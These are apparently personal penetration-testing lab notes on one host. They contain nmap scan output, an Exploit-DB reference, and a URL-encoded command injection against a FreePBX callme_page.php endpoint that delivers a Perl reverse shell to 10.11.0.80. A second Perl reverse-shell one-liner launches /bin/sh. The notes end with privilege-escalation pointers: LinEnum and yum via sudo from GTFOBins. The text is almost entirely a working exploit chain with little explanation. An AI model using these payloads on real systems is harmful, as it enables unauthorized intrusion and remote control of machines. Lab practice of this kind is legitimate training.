Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-03 13:12 CST Nmap scan report for 10.11.1.217 Host is up (0.29s latency). Not shown: 987 closed ports, 2 filtered ports Some closed ports may be reported as filtered due to –defeat-rst-ratelimit PORT STATE SERVICE 22/tcp open ssh 25/tcp open smtp 80/tcp open http 110/tcp open pop3 111/tcp open rpcbind 143/tcp open imap 443/tcp open https 993/tcp open imaps 995/tcp open pop3s 3306/tcp open mysql 4445/tcp open upnotifyp MAC Address: 00:50:56:89:1E:E1 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 6.51 seconds

https://www.exploit-db.com/exploits/18650

https://10.11.1.217/recordings/misc/callme_page.php?action=c&callmenum=1000@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%2210.11.0.80%3a443%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A

perl -e ‘use Socket;$i=”10.11.0.80”;$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’

not root shell yet

run LinEnum.sh

use yum to get root shell

https://gtfobins.github.io/gtfobins/yum/#sudo